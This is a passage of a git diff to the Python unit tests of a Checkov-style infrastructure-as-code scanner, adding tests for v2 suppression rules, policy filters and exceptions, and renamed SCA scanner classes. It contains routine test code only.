+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+
+        self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+        self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+        self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression))
+
     def test_suppress_by_policy_BC_VUL_2(self):
         instance = BcPlatformIntegration()
 
@@ -818,6 +849,45 @@ def test_account_suppression(self):
         self.assertTrue(suppressions_integration._check_suppression(record1, suppression))
         self.assertFalse(suppressions_integration._check_suppression(record2, suppression))
 
+    def test_repo_v2_suppression(self):
+        instance = BcPlatformIntegration()
+        instance.repo_id = 'org/repo'
+        suppressions_integration = SuppressionsIntegration(instance)
+        suppressions_integration._init_repo_regex()
+        suppression = {
+            "ruleType": "repository",
+            "repositories": [
+                {"repositoryName": "org/repo"},
+                {"repositoryName": "not/valid"}
+            ],
+            "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"],
+        }
+
+        # this is actually almost the same as a policy check, except we care about the repo name in the integration
+        # record details do not matter, except policy ID
+        record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+
+        self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+        self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+        self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression))
+
+        instance.repo_id = 'another/repo'
+        self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression))
+
     def test_account_suppression_cli_repo(self):
         instance = BcPlatformIntegration()
         instance.repo_id = 'org/repo'
@@ -845,6 +915,45 @@ def test_account_suppression_cli_repo(self):
         self.assertTrue(suppressions_integration._check_suppression(record1, suppression))
         self.assertFalse(suppressions_integration._check_suppression(record2, suppression))
 
+    def test_repo_v2_suppression_cli_repo(self):
+        instance = BcPlatformIntegration()
+        instance.repo_id = 'org/repo'
+        suppressions_integration = SuppressionsIntegration(instance)
+        suppressions_integration._init_repo_regex()
+        suppression = {
+            "ruleType": "repository",
+            "repositories": [
+                {"repositoryName": "1234_org/repo"},
+                {"repositoryName": "1234_not/valid"}
+            ],
+            "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"],
+        }
+
+        # this is actually almost the same as a policy check, except we care about the repo name in the integration
+        # record details do not matter, except policy ID
+        record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record3 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+
+        self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+        self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+        self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression))
+
+        instance.repo_id = 'another/repo'
+        self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression))
+
     def test_resource_suppression(self):
         instance = BcPlatformIntegration()
         instance.repo_id = 'org/repo'
@@ -1013,6 +1122,71 @@ def test_tag_suppression(self):
         self.assertFalse(suppressions_integration._check_suppression(record4, suppression))
         self.assertFalse(suppressions_integration._check_suppression(record5, suppression))
 
+    def test_file_v2_suppression_cli_repo(self):
+        instance = BcPlatformIntegration()
+        instance.repo_id = 'org/repo'
+        suppressions_integration = SuppressionsIntegration(instance)
+        suppressions_integration._init_repo_regex()
+        suppression = {
+            "ruleType": "file",
+            "files": [
+                {
+                    "repositoryName": "1234_org/repo",
+                    "filePath": "test/file.txt"
+                },
+                {
+                    "repositoryName": "1234_org/repo2",
+                    "filePath": "/test/file2.txt"
+                },
+                {
+                    "repositoryName": "1234_not/valid",
+                    "filePath": "/test/file3.txt"
+                }
+            ],
+            "checkovPolicyIds": ["CKV_AWS_18", "CKV_AWS_19"],
+        }
+
+        # this is actually almost the same as a policy check, except we care about the repo name in the integration
+        # record details do not matter, except policy ID
+        record1 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record1.repo_file_path = '/test/file.txt'
+        record2 = Record(check_id='CKV_AWS_19', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record2.repo_file_path = 'test/file.txt'  # should still match despite missing slash
+        record3 = Record(check_id='CKV_AWS_18', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record3.repo_file_path = '/test/file2.txt'
+        record4 = Record(check_id='CKV_AWS_1', check_name=None, check_result=None,
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record4.repo_file_path = 'test/file.txt'
+
+        self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+        self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+        self.assertFalse(suppressions_integration._check_suppression_v2(record3, suppression))  # right file, wrong repo
+        self.assertFalse(suppressions_integration._check_suppression_v2(record4, suppression))
+
+        record1.repo_file_path = '/test/file2.txt'
+        record2.repo_file_path = 'test/file2.txt'
+        instance.repo_id = 'org/repo2'  # now check the same thing but with a leading slash in the suppression file
+        self.assertTrue(suppressions_integration._check_suppression_v2(record1, suppression))
+        self.assertTrue(suppressions_integration._check_suppression_v2(record2, suppression))
+
+        instance.repo_id = 'another/repo'
+        self.assertFalse(suppressions_integration._check_suppression_v2(record1, suppression))
+
     def test_apply_suppressions_to_report(self):
         instance = BcPlatformIntegration()
 
@@ -1024,6 +1198,7 @@ def test_apply_suppressions_to_report(self):
             "policyId": "BC_AWS_GENERAL_31",
             "comment": "No justification comment provided.",
             "checkovPolicyId": "CKV_AWS_79",
+            "isV1": True
         }
 
         suppressions_integration.suppressions = {suppression['checkovPolicyId']: [suppression]}
@@ -1065,44 +1240,126 @@ def test_apply_suppressions_to_report(self):
         self.assertEqual(len(report.passed_checks), 1)
         self.assertEqual(report.passed_checks[0].check_id, 'CKV_AWS_2')
         self.assertEqual(len(report.skipped_checks), 2)
+        self.assertEqual(report.skipped_checks[0].check_result['suppress_comment'], "No justification comment provided.")
+
+    def test_apply_suppressions_to_report_with_v2(self):
+        instance = BcPlatformIntegration()
+
+        suppressions_integration = SuppressionsIntegration(instance)
+
+        suppression = {
+            "ruleType": "policy",
+            "checkovPolicyIds": ["CKV_AWS_79", "CKV_AWS_80"],
+            "isV1": False,
+            "justificationComment": "comment"
+        }
+
+        suppressions_integration.suppressions_v2 = {id: [suppression] for id in suppression['checkovPolicyIds']}
+
+        record1 = Record(check_id='CKV_AWS_79', check_name=None,
+                         check_result={'result': CheckResult.FAILED, 'evaluated_keys': ['multi_az']},
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record2 = Record(check_id='CKV_AWS_1', check_name=None,
+                         check_result={'result': CheckResult.FAILED, 'evaluated_keys': ['multi_az']},
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record3 = Record(check_id='CKV_AWS_80', check_name=None,
+                         check_result={'result': CheckResult.PASSED, 'evaluated_keys': ['multi_az']},
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+        record4 = Record(check_id='CKV_AWS_2', check_name=None,
+                         check_result={'result': CheckResult.PASSED, 'evaluated_keys': ['multi_az']},
+                         code_block=None, file_path=None,
+                         file_line_range=None,
+                         resource=None, evaluations=None,
+                         check_class=None, file_abs_path='.', entity_tags=None)
+
+        report = Report('terraform')
+        report.add_record(record1)
+        report.add_record(record2)
+        report.add_record(record3)
+        report.add_record(record4)
+
+        suppressions_integration._apply_suppressions_to_report(report)
+        self.assertEqual(len(report.failed_checks), 1)
+        self.assertEqual(report.failed_checks[0].check_id, 'CKV_AWS_1')
+        self.assertEqual(len(report.passed_checks), 1)
+        self.assertEqual(report.passed_checks[0].check_id, 'CKV_AWS_2')
+        # We are omitting policy level suppression
+        self.assertEqual(len(report.skipped_checks), 0)
 
     def test_get_policy_level_suppressions(self):
         instance = BcPlatformIntegration()
 
         suppressions_integration = SuppressionsIntegration(instance)
         suppressions_integration.suppressions = {
-            'CKV_AWS_252': [{'suppressionType': 'Policy', 'id': '404088ed-4251-41ac-8dc1-45264af0c461',
+            'CKV_AWS_252': [{'suppressionType': 'Policy', "isV1": True, 'id': '404088ed-4251-41ac-8dc1-45264af0c461',
                              'policyId': 'BC_AWS_GENERAL_175', 'creationDate': '2022-11-09T16:27:36.413Z',
                              'comment': 'Test2', 'checkovPolicyId': 'CKV_AWS_252'}],
             'CKV_AWS_36': [
-                {'suppressionType': 'Policy', 'id': 'b68013bc-2908-4c9a-969d-f1640d4aca11',
+                {'suppressionType': 'Policy', "isV1": True, 'id': 'b68013bc-2908-4c9a-969d-f1640d4aca11',
                  'policyId': 'BC_AWS_LOGGING_2',
                  'creationDate': '2022-11-09T16:11:58.435Z', 'comment': 'Testing', 'checkovPolicyId': 'CKV_AWS_36'}],
             'CKV_K8S_27': [
-                {'suppressionType': 'Policy', 'id': '271c1a79-2333-4a12-bf7d-55ec78468b94', 'policyId': 'BC_K8S_26',
+                {'suppressionType': 'Policy', "isV1": True, 'id': '271c1a79-2333-4a12-bf7d-55ec78468b94', 'policyId': 'BC_K8S_26',
                  'creationDate': '2022-12-08T08:00:04.561Z', 'comment': 'test checkov suppressions',
                  'checkovPolicyId': 'CKV_K8S_27'}],
             'acme_AWS_1668010000289': [
-                {'suppressionType': 'Resources', 'id': '5565e523-58da-4bc7-970e-c3fceef93ac1',
+                {'suppressionType': 'Resources', "isV1": True, 'id': '5565e523-58da-4bc7-970e-c3fceef93ac1',
                  'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.887Z',
                  'comment': 'Testing', 'resources': [{'accountId': 'acme_cli_repo/testing-resources',
                                                       'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail9'}],
                  'checkovPolicyId': 'acme_AWS_1668010000289'},
-                {'suppressionType': 'Resources', 'id': 'adf6f831-4393-4dcb-b345-2a14bf944267',
+                {'suppressionType': 'Resources', "isV1": True, 'id': 'adf6f831-4393-4dcb-b345-2a14bf944267',
                  'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.951Z',
                  'comment': 'Testing', 'resources': [{'accountId': 'acme_cli_repo/testing-resources',
                                                       'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail10'}],
                  'checkovPolicyId': 'acme_AWS_1668010000289'},
-                {'suppressionType': 'Resources', 'id': '86d88e69-5755-4e69-965b-f97fc26e784b',
+                {'suppressionType': 'Resources', "isV1": True, 'id': '86d88e69-5755-4e69-965b-f97fc26e784b',
                  'policyId': 'acme_AWS_1668010000289', 'creationDate': '2022-11-09T16:28:50.838Z',
                  'comment': 'Testing', 'resources': [{'accountId': 'acme_cli_repo/testing-resources',
                                                       'resourceId': '/src/BC_AWS_LOGGING_7.tf:aws_cloudtrail.cloudtrail8'}],
                  'checkovPolicyId': 'acme_AWS_1668010000289'}]}
 
+        suppressions_integration.suppressions_v2 = {
+            "CKV3_SAST_1": [{
+                "ruleType": "policy",
+                "isV1": False,
+                "id": "1111",
+                "policyIds": ["BC_SAST_1", "BC_SAST_2"]
+            }],
+            "CKV3_SAST_2": [
+                {
+                    "ruleType": "policy",
+                    "isV1": False,
+                    "id": "2222",
+                    "policyIds": ["BC_SAST_3", "BC_SAST_2"]
+                },
+                {
+                    "ruleType": "repository",
+                    "isV1": False,
+                    "id": "3333",
+                    "policyIds": ["BC_SAST_1", "BC_SAST_3"]
+                }
+            ]
+        }
+
         expected_suppressions = ['404088ed-4251-41ac-8dc1-45264af0c461', 'b68013bc-2908-4c9a-969d-f1640d4aca11',
-                                 '271c1a79-2333-4a12-bf7d-55ec78468b94']
+                                 '271c1a79-2333-4a12-bf7d-55ec78468b94', '1111', '2222']
         policy_level_suppressions = suppressions_integration.get_policy_level_suppressions()
         self.assertEqual(expected_suppressions, list(policy_level_suppressions.keys()))
+        self.assertEqual(policy_level_suppressions['404088ed-4251-41ac-8dc1-45264af0c461'], ['BC_AWS_GENERAL_175'])
+        self.assertEqual(policy_level_suppressions['b68013bc-2908-4c9a-969d-f1640d4aca11'], ['BC_AWS_LOGGING_2'])
+        self.assertEqual(policy_level_suppressions['271c1a79-2333-4a12-bf7d-55ec78468b94'], ['BC_K8S_26'])
+        self.assertEqual(policy_level_suppressions['1111'], ["BC_SAST_1", "BC_SAST_2"])
+        self.assertEqual(policy_level_suppressions['2222'], ["BC_SAST_3", "BC_SAST_2"])
 
 
 if __name__ == '__main__':
diff --git a/tests/common/integration_features/test_vulnerabilities_integration.py b/tests/common/integration_features/test_vulnerabilities_integration.py
index d38449f6ec3..430530a2294 100644
--- a/tests/common/integration_features/test_vulnerabilities_integration.py
+++ b/tests/common/integration_features/test_vulnerabilities_integration.py
@@ -58,7 +58,9 @@ def test_full_enrich_cves(self):
         sast_report: SastReport = SastReport(check_type=CheckType.SAST_JAVASCRIPT,
                                              language=SastLanguages.JAVASCRIPT, metadata=None,
                                              sast_report=PrismaReport(rule_match={}, errors={}, profiler={},
-                                                                      run_metadata={}, imports={}, reachability_report={}))
+                                                                      run_metadata={}, imports={},
+                                                                      reachability_report={},
+                                                                      skipped_checks_by_file={}))
         sast_report.sast_imports = sast_imports
         merged_reports = [sca_report, sast_report]
 
@@ -93,7 +95,9 @@ def test_unsupported_sast_lang(self):
         sast_report: SastReport = SastReport(check_type=CheckType.SAST_JAVASCRIPT,
                                              language=SastLanguages.JAVASCRIPT, metadata=None,
                                              sast_report=PrismaReport(rule_match={}, errors={}, profiler={},
-                                                                      run_metadata={}, imports={}, reachability_report={}))
+                                                                      run_metadata={}, imports={},
+                                                                      reachability_report={},
+                                                                      skipped_checks_by_file={}))
         sast_report.sast_imports = sast_imports
         merged_reports = [sca_report, sast_report]
 
diff --git a/tests/common/output/test_bom_report.py b/tests/common/output/test_bom_report.py
index 19ddb44d5c6..42f4c1b7797 100644
--- a/tests/common/output/test_bom_report.py
+++ b/tests/common/output/test_bom_report.py
@@ -41,7 +41,7 @@ def test_iac_csv_output(self, tmp_path: Path):
         with open(iac_file_path) as file:
             content = file.readlines()
             header = content[:1][0]
-            assert 'Resource,Path,Git Org,Git Repository,Misconfigurations,Severity\n' == header
+            assert 'Resource,Path,Git Org,Git Repository,Misconfigurations,Severity,Policy title,Guideline\n' == header
             rows = content[1:]
             assert 'aws_s3_bucket' in rows[0]
 
diff --git a/tests/common/output/test_cyclonedx_report.py b/tests/common/output/test_cyclonedx_report.py
index dd54de44beb..f225fdf640e 100644
--- a/tests/common/output/test_cyclonedx_report.py
+++ b/tests/common/output/test_cyclonedx_report.py
@@ -141,7 +141,7 @@ def test_sca_packages_cyclonedx_bom():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "id": "CVE-2019-19844",
         "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
@@ -202,7 +202,7 @@ def test_duplicate_sca_packages_cyclonedx_bom():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "id": "CVE-2019-19844",
         "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
diff --git a/tests/common/output/test_get_exit_code.py b/tests/common/output/test_get_exit_code.py
index 271579d4d83..d10d97e319e 100644
--- a/tests/common/output/test_get_exit_code.py
+++ b/tests/common/output/test_get_exit_code.py
@@ -40,7 +40,7 @@ def test_sca_get_exit_code(self):
             code_block=[],
             file_line_range=[],
             evaluations=None,
-            check_class='checkov.sca_package.scanner.Scanner',
+            check_class='checkov.sca_package_2.scanner.Scanner',
             file_abs_path='/requirements.txt'
         ))
         report.add_record(Record(
@@ -54,7 +54,7 @@ def test_sca_get_exit_code(self):
             code_block=[],
             file_line_range=[],
             evaluations=None,
-            check_class='checkov.sca_package.scanner.Scanner',
+            check_class='checkov.sca_package_2.scanner.Scanner',
             file_abs_path='/requirements.txt'
         ))
         report.add_record(Record(
@@ -68,7 +68,7 @@ def test_sca_get_exit_code(self):
             code_block=[],
             file_line_range=[],
             evaluations=None,
-            check_class='checkov.sca_package.scanner.Scanner',
+            check_class='checkov.sca_package_2.scanner.Scanner',
             file_abs_path='/requirements.txt'
         ))
         report.add_record(Record(
@@ -82,7 +82,7 @@ def test_sca_get_exit_code(self):
             code_block=[],
             file_line_range=[],
             evaluations=None,
-            check_class='checkov.sca_package.scanner.Scanner',
+            check_class='checkov.sca_package_2.scanner.Scanner',
             file_abs_path='/requirements.txt'
         ))
         report.add_record(Record(
@@ -96,7 +96,7 @@ def test_sca_get_exit_code(self):
             code_block=[],
             file_line_range=[],
             evaluations=None,
-            check_class='checkov.sca_package.scanner.Scanner',
+            check_class='checkov.sca_package_2.scanner.Scanner',
             file_abs_path='/requirements.txt'
         ))
         report.add_record(Record(
@@ -110,7 +110,7 @@ def test_sca_get_exit_code(self):
             code_block=[],
             file_line_range=[],
             evaluations=None,
-            check_class='checkov.sca_package.scanner.Scanner',
+            check_class='checkov.sca_package_2.scanner.Scanner',
             file_abs_path='/requirements.txt'
         ))
         report.add_record(Record(
@@ -124,7 +124,7 @@ def test_sca_get_exit_code(self):
             code_block=[],
             file_line_range=[],
             evaluations=None,
-            check_class='checkov.sca_package.scanner.Scanner',
+            check_class='checkov.sca_package_2.scanner.Scanner',
             file_abs_path='/requirements.txt'
         ))
         report.add_record(Record(
@@ -138,7 +138,7 @@ def test_sca_get_exit_code(self):
             code_block=[],
             file_line_range=[],
             evaluations=None,
-            check_class='checkov.sca_package.scanner.Scanner',
+            check_class='checkov.sca_package_2.scanner.Scanner',
             file_abs_path='/requirements.txt'
         ))
 
diff --git a/tests/common/output/test_gitlab_sast_report.py b/tests/common/output/test_gitlab_sast_report.py
index 66260885a95..6e28ab919d7 100644
--- a/tests/common/output/test_gitlab_sast_report.py
+++ b/tests/common/output/test_gitlab_sast_report.py
@@ -84,7 +84,7 @@ def test_sca_package_output():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "id": "CVE-2019-19844",
         "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
@@ -184,7 +184,7 @@ def test_sca_license_output():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     license_statuses = [
         {
             "package_name": "github.com/apparentlymart/go-textseg/v12",
diff --git a/tests/common/output/test_sarif_report.py b/tests/common/output/test_sarif_report.py
index c93698f3a87..a8e83e6917a 100644
--- a/tests/common/output/test_sarif_report.py
+++ b/tests/common/output/test_sarif_report.py
@@ -398,7 +398,7 @@ def test_non_url_guideline_link(self):
 
 def get_sarif_schema() -> dict[str, Any]:
     file_name, headers = urllib.request.urlretrieve(
-        "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Documents/CommitteeSpecifications/2.1.0/sarif-schema-2.1.0.json"
+        "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json"
     )
     with open(file_name, "r") as file:
         schema = json.load(file)
diff --git a/tests/common/output/test_spdx.py b/tests/common/output/test_spdx.py
index d26d3febf68..524e11143e2 100644
--- a/tests/common/output/test_spdx.py
+++ b/tests/common/output/test_spdx.py
@@ -14,7 +14,7 @@ def test_sca_package_output():
     # given
     rootless_file_path = "requirements.txt"
     file_abs_path = "/path/to/requirements.txt"
-    check_class = "checkov.sca_package.scanner.Scanner"
+    check_class = "checkov.sca_package_2.scanner.Scanner"
     vulnerability_details = {
         "id": "CVE-2019-19844",
         "status": "fixed in 3.0.1, 2.2.9, 1.11.27",
diff --git a/tests/common/runner_registry/test_runner_registry.py b/tests/common/runner_registry/test_runner_registry.py
index a3efec826df..b1789a10c15 100644
--- a/tests/common/runner_registry/test_runner_registry.py
+++ b/tests/common/runner_registry/test_runner_registry.py
@@ -26,7 +26,6 @@
 from checkov.main import DEFAULT_RUNNERS
 from checkov.runner_filter import RunnerFilter
 from checkov.sca_package_2.runner import Runner as sca_package_runner_2
-from checkov.sca_package.runner import Runner as sca_package_runner
 from checkov.terraform.runner import Runner as tf_runner
 from checkov.bicep.runner import Runner as bicep_runner
 from checkov.sast.runner import Runner as SastRunner
@@ -168,7 +167,7 @@ def test_compact_csv_output(self):
         with open(iac_file_path) as file:
             content = file.readlines()
             header = content[:1][0]
-            self.assertEqual('Resource,Path,Git Org,Git Repository,Misconfigurations,Severity\n', header)
+            self.assertEqual('Resource,Path,Git Org,Git Repository,Misconfigurations,Severity,Policy title,Guideline\n', header)
             rows = content[1:]
             self.assertIn('aws_s3_bucket', rows[0])
         oss_file_path = re.search("Persisting SBOM to (.*oss_packages.csv)", output).group(1)
@@ -266,12 +265,6 @@ def test_runner_file_filter(self):
         runner_registry.filter_runners_for_files(['main.tf'])
         self.assertEqual(set(r.check_type for r in runner_registry.runners), {'terraform', 'secrets'})
 
-        runner_registry = RunnerRegistry(
-            banner, runner_filter, *DEFAULT_RUNNERS, sca_package_runner()
-        )
-        runner_registry.filter_runners_for_files(['main.tf', 'requirements.txt'])
-        self.assertEqual(set(r.check_type for r in runner_registry.runners), {'terraform', 'secrets', 'sca_package'})
-
         runner_registry = RunnerRegistry(
             banner, runner_filter, *DEFAULT_RUNNERS, sca_package_runner_2()
         )
diff --git a/tests/common/sca/reachability/test_alias_mapping_creator.py b/tests/common/sca/reachability/test_alias_mapping_creator.py
index c1afa0b4193..bf0144717f6 100644
--- a/tests/common/sca/reachability/test_alias_mapping_creator.py
+++ b/tests/common/sca/reachability/test_alias_mapping_creator.py
@@ -1,5 +1,6 @@
 import os
 from checkov.common.sca.reachability.package_alias_mapping.alias_mapping_creator import AliasMappingCreator
+from checkov.common.sca.reachability.package_alias_mapping.nodejs.utils import load_json_with_comments
 
 current_dir = os.path.dirname(os.path.realpath(__file__))
 
@@ -27,3 +28,42 @@ def test_alias_mapping_creator():
             }
         }
     }
+
+def test_load_json_with_no_comments():
+    json_data_with_comments = """
+    {
+      "compilerOptions": {
+        "paths": {
+          "@modules/*": ["src/modules/*"],
+          "@shared/*": ["src/shared/*"]
+        },
+        "declaration": true,
+        "target": "es2021",
+        "strict": true /* Enable all strict type-checking options. */,
+        "noUnusedLocals": false, // off for convenience, enable to enforce cleaner code
+        "noUnusedParameters": false, // off for convenience, enable to enforce cleaner code
+        "noImplicitAny": false,  // off for convenience, recommended value is true to enforce types and reduce bugs
+        "forceConsistentCasingInFileNames": true /* Disallow inconsistently-cased references to the same file. */,
+        "resolveJsonModule": true
+      },
+      "exclude": ["node_modules", "dist"]
+    }
+    """
+    clean_json = load_json_with_comments(json_data_with_comments)
+    assert clean_json == {
+        "compilerOptions": {
+            "paths": {
+                "@modules/*": ["src/modules/*"],
+                "@shared/*": ["src/shared/*"]
+            },
+            "declaration": True,
+            "target": "es2021",
+            "strict": True,
+            "noUnusedLocals": False,
+            "noUnusedParameters": False,
+            "noImplicitAny": False,
+            "forceConsistentCasingInFileNames": True,
+            "resolveJsonModule": True
+        },
+        "exclude": ["node_modules", "dist"]
+    }
\ No newline at end of file
diff --git a/tests/common/test_platform_integration.py b/tests/common/test_platform_integration.py
index 003f5b5ce34..c0c6271de6a 100644
--- a/tests/common/test_platform_integration.py
+++ b/tests/common/test_platform_integration.py
@@ -139,24 +139,35 @@ def test_should_upload(self):
 
     def test_run_config_url(self):
         instance = BcPlatformIntegration()
+        instance.repo_id = 'owner/repo'
         instance.bc_api_key = '00000000-0000-0000-0000-000000000000'
-        self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=bc&enforcementv2=true'))
+        self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=bc&enforcementv2=true&repoId=owner/repo'))
         instance.bc_api_key = '00000000-0000-0000-0000-000000000000::1234=='
-        self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=pc&enforcementv2=true'))
+        self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=pc&enforcementv2=true&repoId=owner/repo'))
+        instance.repo_id = 'encode/më'
+        self.assertTrue(instance.get_run_config_url().endswith('/runConfiguration?module=pc&enforcementv2=true&repoId=encode/m%C3%AB'))
 
     def test_is_valid_policy_filter(self):
         instance = BcPlatformIntegration()
         instance.bc_api_key = '00000000-0000-0000-0000-000000000000::1234=='
         instance.customer_run_config_response = mock_customer_run_config()
-        self.assertTrue(instance.is_valid_policy_filter(policy_filter={'policy.label': 'CODE'},
+        self.assertTrue(instance.is_valid_policy_filter(policy_filter=[('policy.label', 'CODE')],
                                                         valid_filters=mock_prisma_policy_filter_response()))
-        self.assertFalse(instance.is_valid_policy_filter(policy_filter={'policy.labels': 'CODE'},
+        self.assertFalse(instance.is_valid_policy_filter(policy_filter=[('policy.labels', 'CODE')],
                                                         valid_filters=mock_prisma_policy_filter_response()))
-        self.assertFalse(instance.is_valid_policy_filter(policy_filter={'policy.label': 'CODE', 'not': 'allowed'},
+        self.assertFalse(instance.is_valid_policy_filter(policy_filter=[('policy.label', 'CODE'), ('not', 'allowed')],
                                                         valid_filters=mock_prisma_policy_filter_response()))
-        self.assertFalse(instance.is_valid_policy_filter(policy_filter={},
+        self.assertFalse(instance.is_valid_policy_filter(policy_filter=[],
                                                          valid_filters=mock_prisma_policy_filter_response()))
-        self.assertFalse(instance.is_valid_policy_filter(policy_filter={'policy.label': ['A', 'B']}, valid_filters={}))
+        self.assertFalse(instance.is_valid_policy_filter(policy_filter=[('policy.label', 'A'), ('policy.label', 'B')], valid_filters={}))
+
+    def test_add_static_policy_filters(self):
+        self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([]), [('policy.enabled', 'true'), ('policy.subtype', 'build')])
+        self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.enabled', 'true')]), [('policy.enabled', 'true'), ('policy.subtype', 'build')])
+        self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.enabled', 'true'), ('policy.subtype', 'build')]), [('policy.enabled', 'true'), ('policy.subtype', 'build')])
+        self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.label', 'xyz')]), [('policy.label', 'xyz'), ('policy.enabled', 'true'), ('policy.subtype', 'build')])
+        self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.label', 'xyz'), ('policy.enabled', 'true')]), [('policy.label', 'xyz'), ('policy.enabled', 'true'), ('policy.subtype', 'build')])
+        self.assertListEqual(BcPlatformIntegration.add_static_policy_filters([('policy.enabled', 'true'), ('policy.label', 'xyz'), ('policy.subtype', 'build')]), [('policy.enabled', 'true'), ('policy.label', 'xyz'), ('policy.subtype', 'build')])
 
     def test_setup_on_prem(self):
         instance = BcPlatformIntegration()
diff --git a/tests/common/test_runner_filter.py b/tests/common/test_runner_filter.py
index c53d097b7e1..a39d5613df9 100644
--- a/tests/common/test_runner_filter.py
+++ b/tests/common/test_runner_filter.py
@@ -445,6 +445,26 @@ def test_should_run_if_no_filtered_policies(self):
                                 filtered_policy_ids=[])
         self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789'))
 
+    def test_should_skip_explicit_run_if_policy_exception(self):
+        instance = RunnerFilter(checks=['CKV_AWS_789'], include_all_checkov_policies=False,
+                                filtered_exception_policy_ids=['CKV_AWS_789'])
+        self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789'))
+
+    def test_should_skip_policy_exception(self):
+        instance = RunnerFilter(skip_checks=['CKV_AWS_789'], include_all_checkov_policies=False,
+                                filtered_exception_policy_ids=["CKV_AWS_789"])
+        self.assertFalse(instance.should_run_check(check_id='CKV_AWS_789'))
+
+    def test_should_run_if_no_policy_exceptions(self):
+        instance = RunnerFilter(checks=['CKV_AWS_789'], include_all_checkov_policies=False,
+                                filtered_exception_policy_ids=[])
+        self.assertTrue(instance.should_run_check(check_id='CKV_AWS_789'))
+
